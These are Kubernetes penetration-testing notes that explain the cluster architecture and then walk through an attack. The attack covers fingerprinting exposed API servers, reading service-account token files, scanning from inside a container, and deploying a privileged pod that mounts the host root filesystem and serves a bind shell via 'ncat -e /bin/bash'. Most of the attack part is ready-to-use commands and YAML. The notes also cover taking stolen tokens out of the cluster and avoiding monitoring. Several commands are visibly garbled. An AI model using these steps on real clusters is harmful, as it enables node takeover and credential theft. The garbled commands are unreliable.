โ˜ธ๏ธkubernetes pentesting

Kubernetes Pentesting

Theory

Kubernetes Architecture

Understanding the entirety of the Kubernetes architecture 2 will help you analyze its weaknesses. The ๏ฌrst component would be to understand the control plane. The control plane of Kubernetes itself is made up of the containers listed next.

NOTE The control plane of a system is the plane, or zone, in which the system operates outside of its standard workloads. This zone is responsible for the backend of the system and organizes the components that make up the system. The plane that a user would interact with for a workload on Kubernetes, such as the web applications hosted on Kubernetes, would be called the data plane.

API Server

The API Server is the heart of the system, and it is integral for communication between the Kubernetes Nodes and the Kubernetes Components.

Etcd

This is a key/value store that contains the database for control plane components. It is a ๏ฌleless equivalent to the /etc directory in a Unix operating system.

kube-scheduler

This is the scheduling system; it maintains the operation of the containers. The kube- scheduler looks at what should be running, how it should be running, and whether it should be running and then ensures those operations execute.

kube-controller-manager

This is a series of controllers that maintain di๏ฌ€erent operating components. Each controller has a speci๏ฌc task, and the manager organizes them.

cloud-controller-manager

The cloud-controller- manager is an abstraction for each cloud, and this allows for Kubernetes to work across di๏ฌ€erent cloud providers or on-premises systems.

Kubelet

The Kubernetes Agent that communicates back to the Kubernetes API Server.

Kube-proxy

A port-forwarding tool thatโ€™s like SSH port forwarding. This allows the operator of the system to communicate with individual containers that are internally available in the cluster.


Practical

Find Kubernetes API Servers

First Method

  • Certi๏ฌcate transparency reports

  • Brute-forcing DNS entries

  • Information disclosure through people submitting code blocks or samples

Second Method

we can ๏ฌnd these same endpoints if we have access to a container in which they are connected to an existing cluster.

  • Control plane: Port 6443, Kubernetes API server

  • TCP: Inbound, 2379-2380, etcd server client API

  • Worker node(s): TCP Inbound, 10250, Kubelet API

Kubernetes Native URIs

  • /version The response may include a keyword like gitVersion, goVersion, or โ€œplatformโ€.

  • /api/v1/pods If you get an answer with โ€œapiVersionโ€ and do not see โ€œpods is forbidden,โ€ then you have found a critical system issue where unauthenticated users can get to pods.

  • /api/v1/info Same as pods, but this is an additional endpoint to ensure that general-purpose permissions are appropriately set.

  • /ui This is the lesser-used Kubernetes Dashboard project URI, which should never be exposed to the Internet.

Scanners may also be keying into speci๏ฌc text in the HTML that is returned by scans:

  • โ€œKubernetes Dashboardโ€ This string reveals HTML that could indicate the presence of the Kubernetes Dashboard.

Fingerprint Kubernetes Servers

# Connect to the kubernetes server
curl -v -k <aws kubernetes url>

# Explore API endpoints
curl -v -k <aws kubernetes url>/version

curl -v -k <aws kubernetes url>/api/v1/pod

Hacking Kubernetes from Within

Get AWS EKS Authentication Token

aws eks get-token -profile <name> -cluster-name <name> -region us-east-1 | jq -r '.status.token'

Kubestriker

This application allows you to scan, specify a URL, or use a con๏ฌguration ๏ฌle to attack a Kubernetes environment.

docker run -- --rm -v /home/kali/.kube/config:/root/.kube/config "v "$(p"d)":/kubestrik- --name kubestriker cloudsecguy/kubestriker:v1.0.0

python -m kubestriker

Run an Ubuntu-based Container Image

kubctl exec -it $(kubectl get pods | a'k '{ print '1}' | grep -v NAME | grep bash) --bin/bash

# Get disto info
cat /etc/lsb-release

# System info
uname -a

# List login credential material
ls -la /var/run/secrets/Kubernetes.io/serviceaccount/

# Install nmap and netcat
apt update -y && apt install curl nmap ncat -y

Enumeration on Ubuntu Container

# Query for local IPv4 address
curl http://<ip>/latest/meta-data/local-ipv4

# Scan for open ports
nmap -n -p1-65535 <Local IP>

# Scan using NSE scripts
nmap -sV -n --script=http-headers,http-title <Local IP> -p1-65535

Attack API Server

There are two ways to approach this:

  • We can move our tools onto the local container. The downside is that we may be caught by any monitoring tools installed in the cluster, such as EDR tools or tools speci๏ฌc to Kubernetes Admission Controller scanning or Kubernetes Container scanning. Sysdig has an open source agent that can provide this type of telemetry. The tools generally will understand how to use the existing credentials in this case.

  • We can move the tokens outside the cluster and then attach to our clusters remotely using those keys. This is done by using the /var/run/secrets/kubernetes.io/serviceaccount/token, ca.crt, and the IP or hostname of the server.

Fist Option

This attack will do the following:

  1. Install a container node with a backdoor listener that executes a Bash shell.

  2. Start it with all local privileges and then mount the host disk to the local system.

Files Needed:

ncat-svc.yml This ๏ฌle exposes the port to the cluster.

apiVersion: v1
kind: Service
metadata:
  name: revshell
  labels:
    run: revshell
spec:
  ports:
  - port: 9999
    protocol: TCP
  selector:
    run: revshell

ncat.yml This is the main deployment script.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: revshell
spec:
  selector:
    matchLabels: 
      run: revshell
  replicas: 1
  template:
    metadata:
      labels:
        run: revshell  
    spec:
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: revshell
        image: raesene/ncat
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "ncat -nvlp 9999 -e /bin/bash;" ]
        ports:
         - containerPort: 9999
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: noderoot
      volumes:
      - name: noderoot
        hostPath:
          path: /

Write the files in Container

kubctl exec -it $(kubectl get pods | a'k '{ print '1}' | grep -v NAME | grep bash) --bin/bash

cd /tmp

cat <<EOF>> ncat-svc.yml

<paste the content here>

EOF

cat <<EOF>> ncat.yml

<paste the content here>

EOF

Once these two ๏ฌles are on the remote server, we will need to download the kubectl ๏ฌle. Once we have all these pieces in the system, we can then have the kubectl apply a new pod to do the following:

  1. The pod will open port 9999.

  2. It will mount all the hostโ€™s PIDs, environment variables, and networking.

  3. It will mount the root ๏ฌle system right into the container.

We can then connect on that port to gain access to the container, which has elevated privileges:

curl -LO "https://dl.k8s.io/release/v1.20.0/bin/linux/amd64/kubectl"

chmod a+x ./kubectl

./kubectl apply -f ncat.yml

./kubectl apply -f ncat-svc.yml

./kubectl get svc

ncat <IP> 9999

whoami

REFERENCES

  • https://kubernetes.io/partners/#conformance

  • https://kubernetes.io/docs/concepts/architecture/

  • https://aws.amazon.com/eks/getting-started/

  • https://microservices-demo.github.io/

  • https://isc.sans.edu/forums/diary/Using+Certi๏ฌcate+Transparency+as+an+Attack+Defense+Tool/24114/

  • https://github.com/coreos/coreos-kubernetes/blob/master/Documentation/kubernetes-networking.md

  • https://istio.io/

  • https://www.github.com/mosesrenegade/tools-repo/